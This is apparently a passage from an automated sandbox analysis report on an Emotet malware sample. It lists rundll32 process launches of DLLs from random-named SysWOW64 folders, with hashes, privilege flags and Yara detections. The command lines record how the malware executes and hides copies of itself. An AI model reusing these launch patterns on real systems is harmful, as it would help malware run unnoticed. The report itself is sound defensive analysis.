                                      Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                                      Imagebase:0xa40000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2100426425.0000000000190000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Author: Joe Security
                                      Reputation:moderate

                                      General

                                      Start time:08:48:46
                                      Start date:06/01/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vgmfknuplwnwb\hrwkllpxgkmn.qzu',Control_RunDLL
                                      Imagebase:0xa40000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102461185.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Author: Joe Security
                                      Reputation:moderate

                                      General

                                      Start time:08:48:47
                                      Start date:06/01/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jpacxmsgxplznz\gypawljxnacjh.cvj',Control_RunDLL
                                      Imagebase:0xa40000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103478043.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000009.00000002.2103529081.0000000000191000.00000020.00000001.sdmp, Author: Joe Security
                                      Reputation:moderate

                                      General

                                      Start time:08:48:48
                                      Start date:06/01/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Crppsin\fgsajt.gvd',Control_RunDLL
                                      Imagebase:0xa40000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2105453444.0000000000231000.00000020.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000A.00000002.2105397432.00000000001C0000.00000040.00000001.sdmp, Author: Joe Security
                                      Reputation:moderate

                                      General

                                      Start time:08:48:49
                                      Start date:06/01/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fohbyq\ikksw.jnv',Control_RunDLL
                                      Imagebase:0xa40000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2347135822.0000000000231000.00000020.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000B.00000002.2347096157.0000000000210000.00000040.00000001.sdmp, Author: Joe Security
                                      Reputation:moderate

                                      Disassembly

                                      Code Analysis

                                      Reset < >